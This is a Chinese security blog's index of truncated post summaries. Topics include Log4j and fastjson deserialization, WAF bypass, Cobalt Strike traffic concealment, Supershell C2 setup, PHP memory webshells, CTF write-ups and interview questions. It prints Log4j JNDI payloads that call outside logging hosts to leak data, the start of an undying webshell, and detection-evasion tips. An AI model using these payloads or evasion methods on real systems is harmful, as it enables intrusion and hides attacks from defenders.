随笔分类 - 网络安全
摘要:结论:log4j是JNDI注入漏洞,可利用漏洞导致反序列化。 而fastjson是反序列化漏洞,可利用漏洞加载JNDI类。 JNDI(Java Naming and Directory Interface)是 Java 提供的一种 API,用于访问命名和目录服务(如 LDAP、RMI、DNS 等)
阅读全文
摘要:CSP与XSS漏洞的关系 1、CSP不依赖漏洞的存在: 2、CSP是独立的安全机制,其有效性取决于策略本身的严格性,而非漏洞是否存在。 例如: 严格CSP(基于nonce):即使站点存在XSS漏洞,攻击者也无法伪造合法的 nonce 值来执行脚本。 宽松CSP(允许unsafe-inline):若漏
阅读全文
摘要:fofa搜索语句:product="AliyunOSS" && body="NoSuchBucket" 访问https://xxx.oss-ap-south-1.aliyuncs.com/ 发现 <Code>NoSuchBucket</Code> <HostId>pkdyxxxx.img-cn-ho
阅读全文
摘要:Cobalt Strike特征隐藏和流量加密 因用公司办公网络做安全测试而被XDR捕捉到流量特征故有此篇。 悲报,还被提交了工单。 做安全测试不要用公司网!不要用公司网!不要用公司网! 服务器开启禁Ping 命令: vim /etc/sysctl.conf 添加一行 net.ipv4.icmp_ec
阅读全文
摘要:Nacos未授权 CVE-2021-29441 环境搭建 环境dockerfile在文末 环境启动 docker-compose up -d 查看下当前的容器 docker ps 漏洞复现 访问Web页面 127.0.0.1:8848 抓包,访问http://127.0.0.1:8848/nacos
阅读全文
摘要:今天搭建了一下supershell,蛮好用的,推荐一手。 GITHUB地址:https://github.com/tdragon6/Supershell 部署 首先必须要先有一台自己的公网服务器,可以考虑阿里云,腾讯云,华为云,百度云之类的。 然后就开始搭建! 输入命令行,下载解压源码 wget h
阅读全文
摘要:更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 Log4j 条件:出网(因为需要请求jndi服务器) ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a.ipv6.1
阅读全文
摘要:本文作者幽壑,本文属于i春秋原创激励计划,欢迎师傅们标明出处转载,一同交流。 https://bbs.ichunqiu.com/thread-63574-1-1.html 国护夜班实在太无聊了,半夜燥热,客户还偷偷藏我们项目经理买的零食,哎,浅浅摸个鱼 打个ctfshow内网靶场。 记一次步履艰辛的
阅读全文
摘要:本篇文章作者幽壑,本文属i春秋原创奖励计划,未经许可禁止转载。 https://bbs.ichunqiu.com/thread-63544-1-1.html 记一次PHP路由审计 工具:Seay源代码审计系统 0x1 反射型xss 首先进行一个自动化扫描,根据结果进行跟进排查 跟进/user/tpl
阅读全文
摘要:本篇文章作者幽壑,本文属i春秋原创奖励计划,未经许可禁止转载。 https://bbs.ichunqiu.com/thread-63533-1-1.html SQLMAP流量特征分析 配置环境 测试靶场:pikachu 测试环境:PHP5.4、Apache 2.0、MYSQL5.0.10 测试工具:
阅读全文
摘要:本文作者幽壑,本文属于i春秋原创激励计划,欢迎师傅们标明出处转载,一同交流。 https://bbs.ichunqiu.com/thread-63575-1-1.html 本文参考书籍 --> 奇安信出版的《网络安全攻防技术实践》 WAF bypass 0x01 垃圾数据绕过 假设一个参数,然后填充
阅读全文
摘要:国护摸鱼,导致60g流量也不够用了。。又不想花钱买流量(我是穷逼),网上找了几个wifi暴力破解(我的电脑并未用于监测研判等工作),md不要去网上乱下载exe之类的可执行文件哦,github上有一个傻呗的wifi破解.exe是个恶意文件,幸好留了个心眼放到了沙箱看了看,草,那人是真没🐎。红队钓鱼也
阅读全文
摘要:内存马(不死马) 最常见的内存马 <?php set_time_limit(0); #用来设置脚本最大的执行时间,如果为0的话,就会一直执行这个脚本,设置其他数字的话,则按照设置的秒数来进行执行,注意,执行时间和php.ini里的max_execution_time设置有很大的关系,真实时间的计算公
阅读全文
摘要:最近在一次授权内网渗透过程中,发现内网存在安恒的明御安全网关,并且在朋友的帮助下成功进入后台,弱口令进入后台,后台功能十分熟悉,在很多厂商的网关里见过,就随手打了一个poc,好了rce了,于是便有了混个证的想法。但是十个弱口令进后台的网站可难住我了,fofa了一下有2000多个站点,试了十几个就一个
阅读全文
摘要:go环境和fscan编译 https://go.dev/dl/ 下载go1.20.4.windows-386.msi nextnextnext就好了 查看go的版本 下载proxifier https://www.proxifier.com/download/ 配置go环境 在cmd命令行中输入代码
阅读全文
摘要:第20届全国大学生信息安全与对抗技术竞赛 荣获 个人赛一等奖 福建省第三届"闽盾杯" 荣获 省赛二等奖荣誉证书 福建省第二届工业互联网安全大赛 荣获 优胜奖 第六届全国网络安全挑战赛"强网杯" 荣获 强网先锋荣誉证书 第一届网络安全技术大赛--校赛 荣获 个人二等奖
阅读全文
摘要:之前忘了发,整理了一下美团一面的面试题 ps:一面就寄了QAQ 自我介绍 询问实习经历 为什么接触网络安全? 你们俱乐部是怎么学习分享的? 都挖到过什么漏洞? 重放,并发漏洞的原理? ssrf怎么利用? redis拿shell方法? 常见的加密方式? 对称加密和非对称加密比如哪些? ssrf绕过方法
阅读全文
摘要:本文源于换了个java版本结果之前的东西都没卸载干净,导致jar文件无法双击打开,但是java -version却好好的。由于懒一直没去正面面对。 近期一直用命令行java -jar的方式打开尤为苦恼,正赶着最近项目,便沉下心思好好修了修。 由于本篇文章仅作个人修复记录,故部分内容参考其他文章,侵删
阅读全文
摘要:230227安恒安服一面 常规的渗透测试流程? src目前提交过什么漏洞?收入有五位数了吗?挖多久了? 你接触网络安全是出于兴趣还是学校的课程? CTF你主要打的方向是什么方向? 你运营公众号都写过什么文章? 你之前做过代码审计这块吗? 内网渗透这块你在实战中打过吗? windows常规提权? 数据
阅读全文
浙公网安备 33010602011771号